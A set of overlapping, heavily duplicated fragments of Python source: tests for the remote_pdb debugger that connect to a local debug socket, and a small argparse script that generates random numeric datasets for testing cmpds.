"print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert",
"os import re import socket import sys import time from process_tests import TestProcess",
"None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x)",
"== '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name =",
"TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break():",
"streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None,",
"test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid",
"TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session",
"from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable,",
"'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at",
"if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" )",
"import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple')",
"TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace",
"with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read,",
"int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT,",
"'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as",
"set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3}",
"print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__':",
"%(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a()",
"wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read,",
"timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"->",
"import socket import sys import time from process_tests import TestProcess from process_tests import",
"session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read):",
"assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda",
"level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name",
"remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon',",
"= int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with",
"TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def",
"from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT",
"TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read()",
"as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\")",
"\"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not",
"as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ')",
"import sys import time from process_tests import TestProcess from process_tests import TestSocket from",
"from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def",
"print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s",
"func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' % x) if __name__ ==",
"TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT,",
"_: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}' %",
"dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10))",
"def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}')",
"'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open",
"set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as",
"block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d",
"TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT,",
"connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}')",
"datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name ==",
"\"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with",
"with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')",
"func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT,"
] |
[
"Config, Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\") results_collection =",
"import Config, Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\") results_collection",
"Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\") results_collection = database.get_collection(\"results\")",
"...kernel import Config, Database config = Config() database = Database(config) articles_collection = database.get_collection(\"articles\")",
"<gh_stars>1-10 from ...kernel import Config, Database config = Config() database = Database(config) articles_collection",
"from ...kernel import Config, Database config = Config() database = Database(config) articles_collection ="
] |
[
"per run. # Typically you would want to generate at least 50 #",
"$ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044",
"{}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places =",
"(c) 2016 by <NAME> import argparse import datetime import inspect import os import",
"That works because cmpds allows you to specify which column to read in",
"''' Write a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno,",
"Write an error message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{}",
"warn(msg, f=1): ''' Write a warning message to stdout. ''' lineno = inspect.stack()[f][2]",
"2: generate a dataset that mocks runtimes between # 115 and 125 seconds",
"of the SND for analysis. $ {0} 8 115 125 124.409 121.153 116.976",
"1 116.212 2 122.327 3 118.571 4 120.238 5 124.852 6 119.652 7",
"= {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper): if opts.decorate:",
"98 upper = 101 ''' for i in range(n): r = random.uniform(lower, upper)",
"generate a dataset that mocks runtimes between # 10 and 12 seconds with",
"to read in the dataset file. Typically you would want to generate at",
"least 50 elements to enable the use of the standard normal distribution (SND)",
"seconds with 2 decimal digits of precision. # Typically you would want to",
"you would want to generate at least 50 elements to enable the use",
"an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def",
"# Example 1: help $ {0} -h # Example 2: generate a dataset",
"for r in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f =",
"} return lookup.get(s, s) argparse._ = gettext # to capitalize help headers base",
"if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower =",
"standard normal distribution (SND) for analysis. ''' # License: MIT Open Source #",
"a header and record counts to make them easier to read. That works",
"and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext # to capitalize",
"Typically you would want to generate at least 50 # elements to enable",
"{0} -h # Example 2: generate a dataset that mocks runtimes between #",
"help message and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext #",
"action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show",
"upper = 101 ''' for i in range(n): r = random.uniform(lower, upper) yield",
"default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''')",
"50 elements to enable the use of the standard normal distribution (SND) for",
"{} must be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date",
"by <NAME> import argparse import datetime import inspect import os import random import",
"= opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound {} must",
"upper): ''' Generate a datasets of n elements in the range [lower..upper]. A",
"create datasets to test cmpds. You can decorate the datasets with a header",
"argparse._ = gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name =",
"headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM>",
"10.000 # upper = 12.000 # decimal places = 2 1 10.30 2",
"'--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION),",
"'{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__ == '__main__':",
"in a range for testing. It is used to create datasets to test",
"the SND for analysis. $ {0} -D 8 115 125 # date =",
"inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message to",
"of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header",
"stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts():",
"help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments at the end.",
"msg)) def warn(msg, f=1): ''' Write a warning message to stdout. ''' lineno",
"= opts.upper[0] if lower > upper: err('lower bound {} must be less than",
"= 50 lower = 98 upper = 101 ''' for i in range(n):",
"Source # Copyright (c) 2016 by <NAME> import argparse import datetime import inspect",
"''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count',",
"[lower..upper]. A typical call might be something like: n = 50 lower =",
"the use of the SND for analysis. $ {0} -D 8 115 125",
"= 2 1 10.30 2 11.48 3 10.50 4 10.25 5 10.52 6",
"'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this",
"argparse. ''' # Trick to capitalize the built-in headers. # Unfortunately I can't",
"= '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__ ==",
"num = 8 # lower = 115.000 # upper = 125.000 # decimal",
"between # 115 and 125 seconds per run and is decorated. # Typically",
"parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase",
"{}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message to stdout. '''",
"08:30:31.039108 # num = 6 # lower = 10.000 # upper = 12.000",
"msg)) def err(msg, f=1): ''' Write an error message to stderr and exit.",
"the standard normal distribution (SND) for analysis. ''' # License: MIT Open Source",
"you to specify which column to read in the dataset file. Typically you",
"base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER>",
"# decimal places = 3 1 116.212 2 122.327 3 118.571 4 120.238",
"Typically you would want to generate at least 50 elements to enable the",
"msg)) sys.exit(1) def getopts(): ''' Get the command line options using argparse. '''",
"''' Write an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno,",
"number of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print",
"upper = 125.000 # decimal places = 3 1 116.212 2 122.327 3",
"3: generate a dataset that mocks runtimes between # 115 and 125 seconds",
"inspect import os import random import sys VERSION = '0.1' def generate_dataset(n, lower,",
"<NAME> import argparse import datetime import inspect import os import random import sys",
"seconds per run and is decorated. # Typically you would want to generate",
"decimal places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper):",
"generate_dataset(n, lower, upper): ''' Generate a datasets of n elements in the range",
"places = 2 1 10.30 2 11.48 3 10.50 4 10.25 5 10.52",
"lower = 98 upper = 101 ''' for i in range(n): r =",
"stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write",
"run and is decorated. # Typically you would want to generate at least",
"10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2],",
"parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts",
"be something like: n = 50 lower = 98 upper = 101 '''",
"{}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line options using argparse.",
"the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the dataset.",
"12.000 # decimal places = 2 1 10.30 2 11.48 3 10.50 4",
"import os import random import sys VERSION = '0.1' def generate_dataset(n, lower, upper):",
"random floating point numbers in a range for testing. It is used to",
"= 0 for r in generate_dataset(num, lower, upper): if opts.decorate: i += 1",
"warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg,",
"= 12.000 # decimal places = 2 1 10.30 2 11.48 3 10.50",
"arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this help message",
"f=1): ''' Write an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{}",
"= inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message",
"to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): '''",
"= inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line",
"121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate a dataset",
"inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message to",
"-d 2 6 10 12 # date = 2016-11-24 08:30:31.039108 # num =",
"for i in range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1):",
"which column to read in the dataset file. Typically you would want to",
"to create datasets to test cmpds. You can decorate the datasets with a",
"# num = 8 # lower = 115.000 # upper = 125.000 #",
"> upper: err('lower bound {} must be less than upper bound {}'.format(lower, upper))",
"{0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 #",
"parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The",
"'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit':",
"is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v',",
"os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n')))",
"num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower > upper:",
"-D 8 115 125 # date = 2016-11-24 08:27:49.668509 # num = 8",
"to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def",
"7 116.400 8 122.446 # Example 4: generate a dataset that mocks runtimes",
"to enable the use of the standard normal distribution (SND) for analysis. '''",
"{0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509 # num =",
"4: generate a dataset that mocks runtimes between # 10 and 12 seconds",
"import sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets",
"parser.parse_args() return opts def main(): ''' Main entry point. ''' opts = getopts()",
"get rid of the \":\" reliably. def gettext(s): lookup = { 'usage: ':",
"opts def main(): ''' Main entry point. ''' opts = getopts() num =",
"decimal places = 3 1 116.212 2 122.327 3 118.571 4 120.238 5",
"enable the use of the SND for analysis. $ {0} -D 8 115",
"parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower',",
"''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return",
"in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places)",
"version number and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1,",
"to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): '''",
"<LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1:",
"err(msg, f=1): ''' Write an error message to stderr and exit. ''' lineno",
"precision. # Typically you would want to generate at least 50 # elements",
"desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $",
"i = 0 for r in generate_dataset(num, lower, upper): if opts.decorate: i +=",
"''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version',",
"1: help $ {0} -h # Example 2: generate a dataset that mocks",
"5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage,",
"metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is %(default)s. ''') parser.add_argument('-D',",
"= 8 # lower = 115.000 # upper = 125.000 # decimal places",
"Example 3: generate a dataset that mocks runtimes between # 115 and 125",
"decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and",
"n elements in the range [lower..upper]. A typical call might be something like:",
"{0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES:",
"getopts(): ''' Get the command line options using argparse. ''' # Trick to",
"decimal places = 2 1 10.30 2 11.48 3 10.50 4 10.25 5",
"a dataset that mocks runtimes between # 10 and 12 seconds with 2",
"and exit': 'Show this help message and exit.\\n ', } return lookup.get(s, s)",
"# date = 2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000",
"# Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of",
"SND for analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128",
"of precision. # Typically you would want to generate at least 50 #",
"analysis. $ {0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509 #",
"''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\")",
"125 # date = 2016-11-24 08:27:49.668509 # num = 8 # lower =",
"lower, upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r))",
"= opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower",
"info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg,",
"Example 1: help $ {0} -h # Example 2: generate a dataset that",
"in range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write",
"lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning",
"= 125.000 # decimal places = 3 1 116.212 2 122.327 3 118.571",
"be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now()))",
"decimal digits of precision. # Typically you would want to generate at least",
"of the \":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional",
"8 # lower = 115.000 # upper = 125.000 # decimal places =",
"decorate the datasets with a header and record counts to make them easier",
"def generate_dataset(n, lower, upper): ''' Generate a datasets of n elements in the",
"'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this help message and",
"to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n",
"a dataset that mocks runtimes between # 115 and 125 seconds per run.",
"sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line options using",
"upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num =",
"f=1): ''' Write a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{}",
"of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound.",
"123.128 121.975 124.312 122.044 # Example 3: generate a dataset that mocks runtimes",
"It is used to create datasets to test cmpds. You can decorate the",
"to make them easier to read. That works because cmpds allows you to",
"MIT Open Source # Copyright (c) 2016 by <NAME> import argparse import datetime",
"$ {0} -h # Example 2: generate a dataset that mocks runtimes between",
"You can decorate the datasets with a header and record counts to make",
"116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate a dataset that",
"121.975 124.312 122.044 # Example 3: generate a dataset that mocks runtimes between",
"''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an",
"Generate random floating point numbers in a range for testing. It is used",
"115 125 # date = 2016-11-24 08:27:49.668509 # num = 8 # lower",
"the use of the SND for analysis. $ {0} 8 115 125 124.409",
"upper = opts.upper[0] if lower > upper: err('lower bound {} must be less",
"= gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0]",
"in the dataset file. Typically you would want to generate at least 50",
"# to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage =",
"with 2 decimal digits of precision. # Typically you would want to generate",
"elements to enable the use of the SND for analysis. $ {0} -D",
"''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the",
"runtimes between # 115 and 125 seconds per run. # Typically you would",
"that mocks runtimes between # 115 and 125 seconds per run. # Typically",
"r''' EXAMPLES: # Example 1: help $ {0} -h # Example 2: generate",
"capitalize the built-in headers. # Unfortunately I can't get rid of the \":\"",
"record counts to make them easier to read. That works because cmpds allows",
"with a header and record counts to make them easier to read. That",
"Get the command line options using argparse. ''' # Trick to capitalize the",
"between # 115 and 125 seconds per run. # Typically you would want",
"6 # lower = 10.000 # upper = 12.000 # decimal places =",
"built-in headers. # Unfortunately I can't get rid of the \":\" reliably. def",
"and 125 seconds per run. # Typically you would want to generate at",
"mocks runtimes between # 10 and 12 seconds with 2 decimal digits of",
"10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog)",
"{:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num,",
"<reponame>jlinoff/cmpds<gh_stars>0 #!/usr/bin/env python ''' Generate random floating point numbers in a range for",
"= '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of n elements",
"4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc,",
"SND for analysis. $ {0} -D -d 2 6 10 12 # date",
"8 115 125 # date = 2016-11-24 08:27:49.668509 # num = 8 #",
"gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage",
"# 115 and 125 seconds per run and is decorated. # Typically you",
"= {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper =",
"a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def",
"argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3,",
"= 2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000 # upper",
"dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store',",
"info(msg, f=1): ''' Write an info message to stdout. ''' lineno = inspect.stack()[f][2]",
"in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper',",
"upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else:",
"118.571 4 120.238 5 124.852 6 119.652 7 116.400 8 122.446 # Example",
"for analysis. $ {0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509",
"used to create datasets to test cmpds. You can decorate the datasets with",
"the \":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments':",
"call might be something like: n = 50 lower = 98 upper =",
"help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS]",
"6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d',",
"action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is %(default)s.",
"using argparse. ''' # Trick to capitalize the built-in headers. # Unfortunately I",
"4 120.238 5 124.852 6 119.652 7 116.400 8 122.446 # Example 4:",
"exit.\\n ', } return lookup.get(s, s) argparse._ = gettext # to capitalize help",
"\":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL",
"and 125 seconds per run and is decorated. # Typically you would want",
"# Trick to capitalize the built-in headers. # Unfortunately I can't get rid",
"Trick to capitalize the built-in headers. # Unfortunately I can't get rid of",
"dataset that mocks runtimes between # 115 and 125 seconds per run. #",
"11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter",
"'--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional",
"a datasets of n elements in the range [lower..upper]. A typical call might",
"125 seconds per run and is decorated. # Typically you would want to",
"decorated. # Typically you would want to generate at least 50 # elements",
"def err(msg, f=1): ''' Write an error message to stderr and exit. '''",
"exit': 'Show this help message and exit.\\n ', } return lookup.get(s, s) argparse._",
"''' opts = getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0]",
"124.852 6 119.652 7 116.400 8 122.446 # Example 4: generate a dataset",
"50 # elements to enable the use of the SND for analysis. $",
"#!/usr/bin/env python ''' Generate random floating point numbers in a range for testing.",
"that mocks runtimes between # 115 and 125 seconds per run and is",
"the range [lower..upper]. A typical call might be something like: n = 50",
"range [lower..upper]. A typical call might be something like: n = 50 lower",
"= 115.000 # upper = 125.000 # decimal places = 3 1 116.212",
